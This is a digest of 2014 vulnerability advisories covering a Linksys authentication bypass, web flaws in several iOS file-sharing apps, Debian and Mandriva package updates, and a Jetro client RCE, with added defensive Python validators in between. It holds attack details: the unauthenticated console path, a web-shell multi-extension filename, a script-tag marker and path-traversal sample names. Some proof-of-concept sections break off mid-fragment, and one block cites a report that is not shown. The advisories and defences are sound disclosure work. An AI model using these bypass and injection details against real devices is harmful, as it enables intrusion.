On affected models, simply browsing to http://IP:8083/ places a user in the admin console with no prompt for authentication. Moreover, by browsing to http://IP:8083/cgi-bin/ the following four CGI scripts (often there are more, depending on the firmware and model) can also be found:

  fw_sys_up.cgi
  override.cgi
  share_editor.cgi
  switch_boot.cgi

It has been observed that port 443 will show as open to external scans when the vulnerability exists, though not all routers with this open port are affected. In the HTTP header for port 8083, for those affected, "Basic Setup" is the only item of note observed. An end user should not rely on the router's GUI interface for the status of remote access, as this bug is present when the console shows remote access as disabled.

CVE ID: CVE-2013-5122
CWE-288: Authentication Bypass Using an Alternate Path or Channel
CVSS Base Score: 10
CVSS Temporal Score: 8.1
Exploitability Subscore: 10.0

Timeline:
The vendor was first notified of this bug in July 2013, and several follow-up conversations have occurred since that time.

Patches/Workaround:
No known patches or official fixes exist, though some workarounds, including reinstallation of the firmware, have often been shown to solve the issue. This is not an official workaround and it is strongly advised to contact Linksys support for additional information.

Recommendations:
- Scan for an open port 8083 from the WAN side of the router to check for this particular vulnerability.
- Since an attacker has access to enable the FTP service, USB drives mounted on those routers which have them should be removed until an official fix is out or vulnerability of the router has been ruled out.

Research Contacts: Kyle Lovett and Matt Claunch
Discovered - July 2013
Updated - February 2014
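The first recommendation, checking port 8083 from the WAN side of a router you administer, needs more than a port scan: the advisory's point is that the port answers with the console and no credential prompt. The script below is an added example written for this digest, not the researchers' tooling. `classify()` is the pure part and decides from an HTTP reply whether the port is closed, challenges for credentials, shows a login form, or serves a page with no challenge at all; `check_router()` performs the probe. The sample replies are constructed, not captured from a device, and the "Basic Setup" title simply mirrors the advisory's observation.

```python
"""Added example (not from the advisory's authors): self-check for the
port 8083 condition described above, for a router you administer."""
import socket
from typing import Dict

PORT = 8083
TIMEOUT = 5.0


def classify(raw: bytes) -> str:
    """Turn the first bytes of an HTTP reply (or nothing at all) into a finding."""
    if not raw:
        return "closed-or-silent"
    head, _, body = raw.partition(b"\r\n\r\n")
    status_line, *headers = head.split(b"\r\n")
    parts = status_line.split(b" ")
    if len(parts) < 2 or not parts[1].isdigit():
        return "not-http"
    status = int(parts[1])
    lowered = [h.lower() for h in headers]
    if status == 401 or any(h.startswith(b"www-authenticate:") for h in lowered):
        return "auth-required"            # the console is challenging for credentials
    if status == 200:
        if b'type="password"' in body.lower():
            return "login-form"           # a form-based prompt, not the bypass
        return "UNAUTHENTICATED-CONSOLE"  # a page served with no challenge at all
    return f"other-{status}"


def check_router(host: str, port: int = PORT) -> str:
    """Connect from the WAN side, request /, and classify the reply. Touches the network."""
    request = b"GET / HTTP/1.0\r\nHost: " + host.encode("ascii") + b"\r\n\r\n"
    try:
        with socket.create_connection((host, port), timeout=TIMEOUT) as sock:
            sock.settimeout(TIMEOUT)
            sock.sendall(request)
            raw = b""
            try:
                while len(raw) < 8192:
                    chunk = sock.recv(1024)
                    if not chunk:
                        break
                    raw += chunk
            except socket.timeout:
                pass          # classify whatever arrived before the device went quiet
    except OSError:
        return "closed-or-silent"
    return classify(raw)


# Constructed replies, not captured from a device.
SAMPLE_OPEN = (b"HTTP/1.0 200 OK\r\nContent-Type: text/html\r\n\r\n"
               b"<html><title>Basic Setup</title></html>")
SAMPLE_BASIC_AUTH = (b"HTTP/1.0 401 Unauthorized\r\n"
                     b'WWW-Authenticate: Basic realm="router"\r\n\r\n')
SAMPLE_FORM = (b"HTTP/1.0 200 OK\r\nContent-Type: text/html\r\n\r\n"
               b'<form><input type="password" name="pw"></form>')


def demo() -> Dict[str, str]:
    """Offline run of the classifier over the constructed replies."""
    return {"open": classify(SAMPLE_OPEN), "basic": classify(SAMPLE_BASIC_AUTH),
            "form": classify(SAMPLE_FORM), "closed": classify(b"")}


if __name__ == "__main__":
    import sys
    print(check_router(sys.argv[1]) if len(sys.argv) > 1 else demo())
```

Run it from outside the LAN (`python3 check8083.py <WAN address>`), since the advisory's finding is about WAN exposure and the console's own "remote access disabled" status is not to be trusted. A `closed-or-silent` result after a firmware reinstall is the condition the advisory's workaround aims for; `UNAUTHENTICATED-CONSOLE` is the finding to act on.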
mbDriveHD v1.0.7 iOS - Multiple Web Vulnerabilities
Document Title:
===============
mbDriveHD v1.0.7 iOS - Multiple Web Vulnerabilities

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1198

Release Date:
=============
2014-02-14

Vulnerability Laboratory ID (VL-ID):
====================================
1198

Common Vulnerability Scoring System:
====================================
6.7

Product & Service Introduction:
===============================
mbDriveHD - Turn your iPad into a wireless network disk and document viewer. With mbDriveHD, transferring files to and from your iPad has never been easier! Thanks to our lightning fast built-in Web server, you can use any web browser to transfer your documents and files to/from iPad.

This app has a 2.7 star rating, with ratings in 27 markets (36 ratings). It occupies the 165441th position in our ranking with 52 points. It is among the 25% best ones of its category and among the 25% best ones of the overall top.

( Copy of the Homepage: https://itunes.apple.com/us/app/mbdrivehd./id384867710 - Commercial $2.99 )
( Copy of the Homepage: https://itunes.apple.com/de/app/mbdrivehd-free/id399732602 - Free Edition )

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the official mbDriveHD v1.0.7 iOS mobile web-application.

Vulnerability Disclosure Timeline:
==================================
2014-02-14: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
mbpowertools
Product: mbDriveHD - iOS Mobile Web Application 1.0.7

Exploitation Technique:
=======================
Local

Severity Level:
===============
High

Technical Details & Description:
================================
1.1
A local file include web vulnerability has been discovered in the official mbDriveHD v1.0.7 iOS mobile web-application. The local file include web vulnerability allows remote attackers to include unauthorized local file/path requests or system specific path commands to compromise the web-application/device.

The web vulnerability is located in the `file name` value of the `Upload` module POST method request. Remote attackers are able to inject their own files with a malicious filename to compromise the mobile application. The attack vector is persistent and the request method is POST. The local file/path include execution occurs in the main file index section after the POST method request.

The security risk of the local file include web vulnerability is estimated as high(+) with a cvss (common vulnerability scoring system) count of 7.1(+)|(-)7.2. Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account with password. Successful exploitation of the local web vulnerability results in mobile application or connected device component compromise by unauthorized local file include web attacks.

Request Method(s):
[+] [POST]

Vulnerable Input(s):
[+] Upload

Vulnerable Parameter(s):
[+] filename

Affected Module(s):
[+] Index File Directory Listing

1.2
A local command/path injection web vulnerability has been discovered in the official mbDriveHD v1.0.7 iOS mobile web-application. The vulnerability allows injection of local commands via vulnerable system values to compromise the Apple iOS mobile application.

The vulnerability is located in the `device name` value of the `index and sub category listing` module. Local attackers are able to inject their own script code as the iOS device name. Execution of the injected script code occurs with a persistent attack vector in the header section of the web interface.

The security risk of the command/path inject vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.0(+)|(-)6.1. Exploitation of the command/path inject vulnerability requires a local low privileged iOS device account with restricted access and no direct user interaction. Successful exploitation of the vulnerability results in unauthorized execution of system specific commands or unauthorized path requests.

Request Method(s):
[+] [GET]

Vulnerable Parameter(s):
[+] devicename

Affected Module(s):
[+] Index File Directory Listing - [Header]

Proof of Concept (PoC):
=======================
1.1
The local file include web vulnerability can be exploited by remote attackers without user interaction or a privileged mobile web-application user account. For security demonstration or to reproduce the vulnerability follow the provided information and steps below.

PoC: Upload [filename]
pa href=/abr table width=750tbody tr td width=500a
File Hub v1.9.1 iOS - Multiple Web Vulnerabilities
Document Title:
===============
File Hub v1.9.1 iOS - Multiple Web Vulnerabilities

References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1195

Release Date:
=============
2014-02-15

Vulnerability Laboratory ID (VL-ID):
====================================
1195

Common Vulnerability Scoring System:
====================================
9.1

Product & Service Introduction:
===============================
File Hub is a powerful and intuitive file manager for iOS. Read, Play, View many file formats, easily transfer files between computer or cloud services and manage files via browser on computer. Voice recorder, text file editor and more.

(Copy of the Vendor Homepage: https://itunes.apple.com/en/app/file-hub-usb+wifi+bluetooth+cloud/id520299954 )

Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple critical web vulnerabilities in the official File Hub v1.9.1 iOS application.

Vulnerability Disclosure Timeline:
==================================
2014-02-15: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Affected Product(s):
====================
Apple AppStore
Product: File Hub - Mobile Web Application 1.9.1

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Critical

Technical Details & Description:
================================
1.1
A critical remote code execution web vulnerability has been discovered in the official File Hub v1.9.1 iOS mobile web-application. The web vulnerability allows remote attackers to execute unauthorized system specific codes or commands to compromise the affected system/service.

The vulnerability is located in the `folder rename via edit` and `new folder` function of the File Hub wifi application interface. Remote attackers are able to inject their own system specific codes as folder/path name to compromise the application. The code execution occurs after the inject via POST method in the main index and the sub category folder. In the sub category folder the code executes in the header location of the application context. In the main index the code execution occurs in the index file dir item list.

The security risk of the remote code execution vulnerability in the new folder function is estimated as critical with a cvss (common vulnerability scoring system) count of 9.3(+)|(-)9.4. Exploitation of the code execution vulnerability requires no user interaction or privileged mobile web-application user account with password. Successful exploitation of the remote code execution vulnerability results in mobile application or connected device component compromise.

Request Method(s):
[+] [POST]

Vulnerable Module(s):
[+] New Folder (Add)

Vulnerable Parameter(s):
[+] folder name

Affected Module(s):
[+] Index File Dir Item List - Path Dir Location on Top
[+] Sub Category - Header Location to Path

1.2
A local file include web vulnerability has been discovered in the official File Hub v1.9.1 iOS mobile web-application. The local file include web vulnerability allows remote attackers to include unauthorized local file/path requests or system specific path commands to compromise the web-application or mobile device.

The web vulnerability is located in the `file name` value of the `Files to Upload` module POST method request. Remote attackers are able to inject their own files with a malicious filename to compromise the mobile application. The attack vector is persistent and the request method is POST. The local file/path include execution occurs in the main file to path section after the refresh of the file upload.

The security risk of the local file include web vulnerability is estimated as high(+) with a cvss (common vulnerability scoring system) count of 7.3(+)|(-)7.4. Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account with password. Successful exploitation of the local web vulnerability results in mobile application or connected device component compromise by unauthorized local file include web attacks.

Request Method(s):
[+] [POST]

Vulnerable Input(s):
[+] Files to Upload

Vulnerable Parameter(s):
[+] filename

Affected Module(s):
[+] Index File Dir Item List
[+] Sub Category File Dir Item List
[+] Index File or Item Edit
[+] Index File or Item Remove/Delete

Proof of Concept (PoC):
=======================
1.1
The remote code execution web vulnerability can be exploited by remote attackers
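The phpMyBackupPro report earlier on this page (a reflected `view` parameter echoed into the page) and the mbDriveHD and File Hub advisories (file names, folder names and the iOS device name rendered into a directory listing and its header) describe the same defect: a user-controlled string written into HTML without encoding for the context it lands in. The script below is an added example written for this digest, not code from any of those three projects. It renders a small listing both ways, adds the upload-name check the two iOS advisories call for, and uses a constructed marker string in place of any real payload; the page layout and the name policy are assumptions made for the example.

```python
"""Added example (not phpMyBackupPro, File Hub or mbDriveHD code): rendering
untrusted names into HTML the defective way and the encoded way, plus an
allow-list check on upload file names."""
import html
import re
from typing import Dict, List
from urllib.parse import quote

# Constructed policy: printable, no separators, no traversal, bounded length.
UPLOAD_NAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9 ._-]{0,127}$")


def accept_upload_name(name: str) -> bool:
    """Reject names carrying path components or markup before they are stored."""
    return bool(UPLOAD_NAME_RE.match(name)) and ".." not in name


def render_unsafe(device_name: str, entries: List[str], message: str) -> str:
    """The defective pattern: raw values interpolated straight into markup."""
    rows = "".join(f'<tr><td><a href="/{n}">{n}</a></td></tr>' for n in entries)
    return f"<h1>{device_name}</h1><table>{rows}</table><p>{message}</p>"


def render_listing(device_name: str, entries: List[str], message: str) -> str:
    """Same page with encoding chosen per context: URL-encoding inside href,
    HTML entity escaping for element text and attribute values."""
    rows = "".join(
        '<tr><td><a href="/{href}">{text}</a></td></tr>'.format(
            href=quote(n, safe=""), text=html.escape(n, quote=True))
        for n in entries)
    return (f"<h1>{html.escape(device_name, quote=True)}</h1>"
            f"<table>{rows}</table>"
            f"<p>{html.escape(message, quote=True)}</p>")


MARKER = "<script>alert(1)</script>"   # constructed; stands in for any injected markup


def contains_live_markup(page: str) -> bool:
    """True if the marker survived as a real tag rather than as text."""
    return "<script>" in page


def demo() -> Dict[str, bool]:
    """The marker as device name, file name and reflected message, both renderers."""
    entries = ["notes.txt", MARKER]
    return {
        "unsafe_has_live_script": contains_live_markup(render_unsafe(MARKER, entries, MARKER)),
        "escaped_has_live_script": contains_live_markup(render_listing(MARKER, entries, MARKER)),
        "marker_accepted_as_upload_name": accept_upload_name(MARKER),
        "plain_accepted_as_upload_name": accept_upload_name("report 2014.pdf"),
    }


if __name__ == "__main__":
    for check, result in demo().items():
        print(f"{check:32} {result}")
    print(render_listing("my iPad", ["a b.txt", MARKER], "uploaded"))
```

Output encoding is the control that closes all three reports at once, because it does not depend on where the string came from (query parameter, upload form, or the device's own settings). The upload-name allow-list is a second, independent layer for the two advisories that describe file and folder names as the vector; it keeps traversal sequences and markup out of storage, so a later page that forgets to encode has less to get wrong.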
[SECURITY] [DSA 2861-1] file security update
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2861-1                   secur...@debian.org
http://www.debian.org/security/                      Salvatore Bonaccorso
February 16, 2014                      http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : file
Vulnerability  : denial of service
CVE ID         : CVE-2014-1943
Debian Bug     : 738832

It was discovered that file, a file type classification tool, contains a flaw in the handling of indirect magic rules in the libmagic library, which leads to an infinite recursion when trying to determine the file type of certain files. The Common Vulnerabilities and Exposures project ID CVE-2014-1943 has been assigned to identify this flaw. Additionally, other well-crafted files might result in long computation times (while using 100% CPU) and overlong results.

For the oldstable distribution (squeeze), this problem has been fixed in version 5.04-5+squeeze3.

For the stable distribution (wheezy), this problem has been fixed in version 5.11-2+deb7u1.

For the unstable distribution (sid), this problem will be fixed soon.

We recommend that you upgrade your file packages.

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBCgAGBQJTAMYgAAoJEAVMuPMTQ89EPNgP/11eRauizW+E7pGfWAHuem5s
IlNcn3sygrkrxz8uts6l51plw+FCfrGyzRVnZAvTDkDWqkRP8zGsEK/i+Qv/Su9M
2zn0vvovYwunlxoXSax6MqO29jZ1vSOg2CvFAcwCB7kXPSKmw3oWU9Cg3z6pjR/h
Tuc0bbQzxp8ztx5P7rIzJqgsaGRhKA+qBhRl2sC9iufJOiJfDn+urI0NOvgTrhxV
BNsB14pKXJodXVS/qexsKip4PpEyB/MJRpaXnWkXahe5KmAMsCXspYev6+Nni5BZ
BaNk/oxzG9NP21MJOWViI+tGTkPkMWCGMJtaP4iuWjgYEKNUvXL0aO8bsoxbqV39
kKHiiEQdy4a3gii2bYBxJJC92PXex5eI7Dx948xeZKJGHopIqUggovIK0uTP8vsI
f+ZaLB7Ul1Vf4FdhcCBEy3S1vZ40nREkOCx/u2UVecSCNmKpbZxnoDpS7kN0w28J
wUVFNRVNOEq9ml8L2IG4GFEMlphsfRMDjDwykjp9T4MhoPu5uYHArKf4JM4qcHyt
2HO9l+kxaoHk0umfP3tWozEHGFXpHnyNj6zxUU4//qeUI9UiXUWnJOlv69VbjjYB
7odV735kuGvEyEllLVOH9p2sRZU9N2TR07aSS80/uoE9RV7GtAvFc662zyVzITkW
gDJIsrUMBJJB87Sjeig3
=Ixdh
-----END PGP SIGNATURE-----
[SECURITY] [DSA 2862-1] chromium-browser security update
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

- -------------------------------------------------------------------------
Debian Security Advisory DSA-2862-1                   secur...@debian.org
http://www.debian.org/security/                           Michael Gilbert
February 16, 2014                      http://www.debian.org/security/faq
- -------------------------------------------------------------------------

Package        : chromium-browser
Vulnerability  : several
CVE ID         : CVE-2013-6641 CVE-2013-6643 CVE-2013-6644 CVE-2013-6645
                 CVE-2013-6646 CVE-2013-6649 CVE-2013-6650

Several vulnerabilities have been discovered in the chromium web browser.

CVE-2013-6641

    Atte Kettunen discovered a use-after-free issue in Blink/Webkit form
    elements.

CVE-2013-6643

    Joao Lucas Melo Brasio discovered a Google account information
    disclosure issue related to the one-click sign-on feature.

CVE-2013-6644

    The chrome development team discovered and fixed multiple issues with
    potential security impact.

CVE-2013-6645

    Khalil Zhani discovered a use-after-free issue related to speech input.

CVE-2013-6646

    Colin Payne discovered a use-after-free issue in the web workers
    implementation.

CVE-2013-6649

    Atte Kettunen discovered a use-after-free issue in the Blink/Webkit SVG
    implementation.

CVE-2013-6650

    Christian Holler discovered a memory corruption in the v8 javascript
    library.

For the stable distribution (wheezy), these problems have been fixed in
version 32.0.1700.123-1~deb7u1.

For the testing distribution (jessie), these problems will be fixed soon.

For the unstable distribution (sid), these problems have been fixed in
version 32.0.1700.123-1.

We recommend that you upgrade your chromium-browser packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQQcBAEBCgAGBQJTAPwuAAoJELjWss0C1vRzHu0f/i51htbha+JCafx87gIm1vU/
z2cLhHDzWEKk47Bhl8Y0BJzl5lMCwAxmBfKaHLLz2/UQvNY4Eva1Jsj0o297KX1z
qHl32L0yAblue5n+iWmccx9/vZ2d0Bj0/tYk8LGZ2W4IzzqhNbRsV2Grq14mA6N0
ne9EMmsJenir8tQBk1GD8yFA4QWStzIxGt0Mmvtt8EdE7Vwk6cBb5wProY9aFwCX
hsui4ysoZL6kZdmlN/hrrZmtA8j7Vnq8v/sgAKZgvXY/b0tBjWQOGyDdDBEECtk7
Y991Zg8IhQCBwt1euICFVKGkdAwq/6mlJAxKJEnzlvj9hw3TiWTFFSkk3fqQJkT1
T/aDoWrGUsPc0iDYo0GrFsJejLvD3jznQiWLU21b+j8GYS6gJoZJDbv8VCwoCHCn
rG+NiRoI9p1DwTWTOSs3h3ypp8On77CC0w3VsNErVv0+GMxQteo+2W85R2AxhdWH
B5RnDfxS/J6DG6dlkkjf3mkUxbT2VidT0TZMDFtqKwREiyEaXRMuUm9BmIIixO2W
nJybfpYJVKmlDsJjmMq6+1jUL1nXAm8AtbWEHS/yHapqlykOSjA2zt4UqOSaOVwz
x5ZiWB5aVf13atISUTJsv6tSZ3OnBjUzW0wHM4D+cw8DMjC9ruoqpoy3hsToCBvi
CesvjFirPNQnQQmltaNvek6lT9b1C8W5lm3IQhj9jiylAPF15Lenfk1YrxTMQ6cd
EI6mRCDCeF1gq1lRopVJkbY0AuHWRHHQpwgiyuAznY+E3iKSksAVVZVfcoO70jxY
q6Ht3lXT5g6tF5GbGE1gZAZn6rm5M3I8fRkBq/7hiKV77ex8g8EdtgvDzN0Jipea
VGL/yQo5/Bn2h+600tWurExSKNlbvUkoTL2/ORJDl79J3n6C8XSGG9I3IpAw/ncx
u26fOfxuQGw/y18QkCvW+J3s8i8v3sdn2NjDI/rS0djUGN4KTZRMFajvthYf1IJg
KhbO/d5D+iZGqNC+B5S8RnDj91xW/tL4KG3hcYlrfRH6o4F1BSeh7q/kQDpnZSNt
z6jXGl1bnPlACRDTDWSNTci2NnlVIj6qIB8V5Lf9BAEDHgQS/Gvv+hVwqJZqIiKC
gdpWEdhZEw4ExsFT8oOUqINbXIG68YujeUwC5gBXStA5YZbnJBMuVU05BOB/3Gsp
zX7W0IEUxaTrDmKqNLNilZ5soBl63Dei4hOOnsnVvBDfuO6HEJNd/kVzB5nV4yYZ
0tujnudHHdfHFVhonzrbUu75Ryk9Y36Md0+cp2n51na2BK2ljdOUUab5x3xbFTQo
PsuIbyJJIrRt+t0cu4S7X47ajZMH/cpQLJTZO0jCeWIOvlX00EyXXtDhLa+sPkA=
=yzUa
-----END PGP SIGNATURE-----
Jetro Cockpit Secure Browsing vulnerability - Client missing input validation allowing RCE
CVE-2014-1861

Affected versions: 4.3.3, 4.3.1 and probably prior versions.

Jetro Cockpit Secure Browsing makes use of a client running on a user's workstation in the enterprise's internal network, and a server in the DMZ that connects on the client's behalf to the internet.

Attack scenario: User causes server to be compromised by an unpatched or 0-day vulnerability. For example, a browser exploit, or a PDF viewer exploit. The product should provide network separation and sand-box such an attack. However the vulnerability found allows a compromised server to execute code on the client machine using the printing mechanism.

Specifically:
- If an attacker gains user-level RCE on the server, the found issue will allow RCE on the same user's workstation in the internal network.
- If an attacker gains elevated privileged RCE on the server (using a PE vulnerability), the found issue will allow RCE on any user's workstation in the internal network.

The client does not validate input coming from the server as a result of a print-to-pdf event. The server can send an .EXE file instead of the expected .PDF file and the client will execute the file upon receiving it.

Full disclosure, demo and details here:
http://blog.quaji.com/2014/02/remote-code-execution-on-all-enterprise.html

Ronen Zilberman
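The check the advisory says is missing on the client side, written out as an added example in Python (this is not Jetro's code and not from the advisory author): a file returned for a print-to-pdf event is accepted only when both its name and its leading bytes say PDF, and anything carrying a PE header or a second extension is refused before it can reach a viewer or file association. The function names and the sample payloads are constructed for this example.

```python
"""Client-side validation of a file handed back by a remote-browsing server.

Added example, not code from Jetro or the advisory author. The client
expects a PDF from the print-to-pdf event, so it must verify that what
arrived really is a PDF before passing it to any viewer or file
association. Names and sample payloads below are constructed.
"""
import os

PDF_MAGIC = b"%PDF-"   # first bytes of every PDF file
PE_MAGIC = b"MZ"       # DOS/PE header that starts .exe and .dll files


def classify_delivered_file(filename: str, data: bytes) -> str:
    """Return 'pdf' if the file may be opened as a PDF, else a rejection reason.

    The decision never relies on the server's claim alone: the name must have
    exactly the expected extension AND the content must carry the PDF header.
    """
    # Refuse anything that could escape the expected download directory.
    if any(sep in filename for sep in ("/", "\\", "\x00")) or ".." in filename:
        return "reject: path component in name"
    if os.path.basename(filename) != filename:
        return "reject: path component in name"
    ext = os.path.splitext(filename)[1].lower()
    if ext != ".pdf":
        # Catches report.exe as well as double extensions like report.pdf.exe
        return "reject: extension"
    if data.startswith(PE_MAGIC):
        return "reject: executable content"
    if not data.startswith(PDF_MAGIC):
        return "reject: not a pdf"
    return "pdf"


def should_open(filename: str, data: bytes) -> bool:
    """True only when the delivered file passes every check above."""
    return classify_delivered_file(filename, data) == "pdf"


# Constructed sample deliveries a client might receive (not real captures).
SAMPLES = {
    "good.pdf": b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog >>\nendobj\n",
    "report.exe": b"MZ\x90\x00\x03\x00",
    "report.pdf": b"MZ\x90\x00\x03\x00",          # executable with a .pdf name
    "report.pdf.exe": b"%PDF-1.4\n",              # double extension
    "..\\startup\\report.pdf": b"%PDF-1.4\n",     # path traversal attempt
}

if __name__ == "__main__":
    for name, payload in SAMPLES.items():
        print(f"{name!r:32} -> {classify_delivered_file(name, payload)}")
```

The order of the checks matters: the name is rejected before the content is looked at, so a traversal-style name never reaches the filesystem, and an executable is identified by its header regardless of what the server named it.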
My PDF Creator DE DM v1.4 iOS - Multiple Vulnerabilities
Document Title:
===============
My PDF Creator DE DM v1.4 iOS - Multiple Vulnerabilities


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1201


Release Date:
=============
2014-02-16


Vulnerability Laboratory ID (VL-ID):
====================================
1201


Common Vulnerability Scoring System:
====================================
7.3


Product Service Introduction:
=============================
My PDF Doc is the all-in-one document management solution for iPhone, iPod touch and iPad. It can catch documents from PC or Mac via USB cable or WIFI, email attachments, Dropbox and box and save it on your iPhone, iPod Touch or iPad locally. Cool app that allows you to create PDF from Map, Website and any other text files. My PDF Doc supports PDF, MS Office, iWorks and the most common file types.

(Copy of the Vendor Homepage: https://itunes.apple.com/us/app/my-pdf-creator-document-editor/id725481535 )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the official My PDF Creator Document Editor (Document Manager) v1.4 iOS mobile web-application.


Vulnerability Disclosure Timeline:
==================================
2014-02-16: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
Apple AppStore
Product: My PDF Creator Document Editor (Document Manager) - iOS 1.4


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================
1.1
A local file include and an arbitrary file upload vulnerability have been discovered in the official My PDF Creator Document Editor (Document Manager) v1.4 iOS mobile web-application. The local file include web vulnerability allows remote attackers to include unauthorized local file/path requests or system specific path commands to compromise the web-application/device.

The vulnerability is located in the upload file submit module of the mobile web-application interface. Remote attackers can manipulate the `upload submit` POST method request with the vulnerable `filename` value to compromise the application or connected device components. The issue allows remote attackers to include local app path values or wifi web-server files. The exploitation appears on the application-side and the inject request method is POST. The execution occurs in the main index file dir list or in the selected sub category folder/path.

The security risk of the local file include web vulnerability is estimated as high(+) with a cvss (common vulnerability scoring system) count of 7.3(+)|(-)7.4. Exploitation of the vulnerability requires no user interaction or privileged mobile application user account. Successful exploitation of the file include web vulnerability results in mobile application compromise, connected device compromise or web-server compromise.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Upload File

Vulnerable Procedure(s):
[+] Submit

Vulnerable Parameter(s):
[+] filename

Affected Module(s):
[+] File Dir Index Listing (http://localhost:50496)
[+] Sub Category (Path) Listing (http://localhost:50496/.xpath)


1.2
An arbitrary file upload web vulnerability has been discovered in the official My PDF Creator Document Editor (Document Manager) v1.4 iOS mobile web-application. The arbitrary file upload issue allows remote attackers to upload files with multiple extensions to bypass the web-server or system validation. As a result the attacker is mostly able to execute the uploaded malicious file.

The vulnerability is located in the upload file module with the submit procedure. Remote attackers are able to upload php or js web-shells by renaming the file with multiple extensions to bypass the file restriction mechanism. The attacker uploads for example a web-shell with the following name and extension `image.jpg.gif.js.php.jpg`. After the upload the attacker needs to open the file in the web application. He deletes the .jpg.gif file extension and can access the application with elevated access rights.

The security risk of the arbitrary file upload web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.7(-). Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privileged mobile application user account with password. Successful exploitation of the vulnerability results in unauthorized file access because of a compromise after the upload of web-shells.

Request Method(s):
[+] [POST]
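Both the File Hub advisory earlier on this page (section 1.2, the `filename` value of the Files to Upload module) and the My PDF Creator advisory just above describe an upload handler that trusts the client-supplied file name: one lets path-like names reach the file listing, the other lets a multi-extension name such as `image.jpg.gif.js.php.jpg` through a check that only looks at the trailing extension. The following added Python example (not code from either app or from Vulnerability Lab) shows that weak check beside a hardened filename sanitizer; the allowed and dangerous extension sets and the sample names are assumptions for the example.

```python
"""Upload filename validation: the weak check beside a hardened one.

Added example, not code from the File Hub or My PDF Creator apps or from
the advisory author. Extension sets and sample names are assumptions.
"""
import re

ALLOWED_EXTS = {"jpg", "jpeg", "png", "gif", "pdf", "txt"}
# Never allowed anywhere in a stored name: a later rename or a lax server
# handler could turn such a file into executable content.
DANGEROUS_EXTS = {"php", "phtml", "php5", "js", "html", "htm", "exe", "sh"}


def lax_is_allowed(name: str) -> bool:
    """The kind of check the advisories describe: only the trailing extension
    is examined, so 'shell.php.jpg' and '../etc/x.jpg' both pass."""
    return name.lower().rsplit(".", 1)[-1] in ALLOWED_EXTS


def sanitize_upload_name(name: str):
    """Return a safe storage name, or None when the upload must be rejected."""
    # 1. No path separators, NUL bytes, or relative/hidden names: the stored
    #    name must never be able to point outside the upload directory.
    if any(c in name for c in ("/", "\\", "\x00")):
        return None
    if name in ("", ".", "..") or name.startswith("."):
        return None
    # 2. Exactly one allowed trailing extension.
    parts = name.lower().split(".")
    if len(parts) < 2:
        return None
    *stem_parts, ext = parts
    if ext not in ALLOWED_EXTS:
        return None
    # 3. No executable extension hidden in the middle of the name, which is
    #    the image.jpg.gif.js.php.jpg trick from the advisory.
    if any(p in DANGEROUS_EXTS for p in stem_parts):
        return None
    # 4. Collapse the remaining stem to a conservative character set so the
    #    stored name carries exactly one dot and nothing a directory listing
    #    could misinterpret as a path or a script.
    stem = re.sub(r"[^a-z0-9_-]+", "_", "_".join(stem_parts)).strip("_")
    stem = stem[:64] or "file"
    return f"{stem}.{ext}"


# Constructed sample names (not captured from either application).
CONSTRUCTED_NAMES = [
    "holiday.jpg",
    "report.final.PDF",
    "image.jpg.gif.js.php.jpg",
    "../../etc/passwd.jpg",
    "shell.php",
    ".htaccess.txt",
]

if __name__ == "__main__":
    for n in CONSTRUCTED_NAMES:
        print(f"{n!r:30} lax={lax_is_allowed(n)!s:5} hardened={sanitize_upload_name(n)!r}")
```

The hardened version does not try to "clean" a bad name into a good one when the name carries a path component or an embedded executable extension; it rejects the upload outright, and only names that were already harmless are normalized. Storing the result under a server-chosen directory, rather than under a client-supplied path, is the other half of the fix.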
[ MDVSA-2014:035 ] libpng
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory                         MDVSA-2014:035
http://www.mandriva.com/en/support/security/
_______________________________________________________________________

Package : libpng
Date    : February 17, 2014
Affected: Business Server 1.0, Enterprise Server 5.0
_______________________________________________________________________

Problem Description:

Updated libpng and libpng12 packages fix security vulnerability:

The png_do_expand_palette function in libpng before 1.6.8 allows remote
attackers to cause a denial of service (NULL pointer dereference and
application crash) via a PLTE chunk of zero bytes or a NULL palette,
related to pngrtran.c and pngset.c (CVE-2013-6954).
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6954
http://advisories.mageia.org/MGASA-2014-0075.html
_______________________________________________________________________

Updated Packages:

Mandriva Enterprise Server 5:
9e459a55c761870ca6b40a12b3d36d66  mes5/i586/libpng3-1.2.31-2.8mdvmes5.2.i586.rpm
de27e436523a787cee10ad4318b3c6dd  mes5/i586/libpng-devel-1.2.31-2.8mdvmes5.2.i586.rpm
dfae88ae67434fb8d6926d747895dae8  mes5/i586/libpng-source-1.2.31-2.8mdvmes5.2.i586.rpm
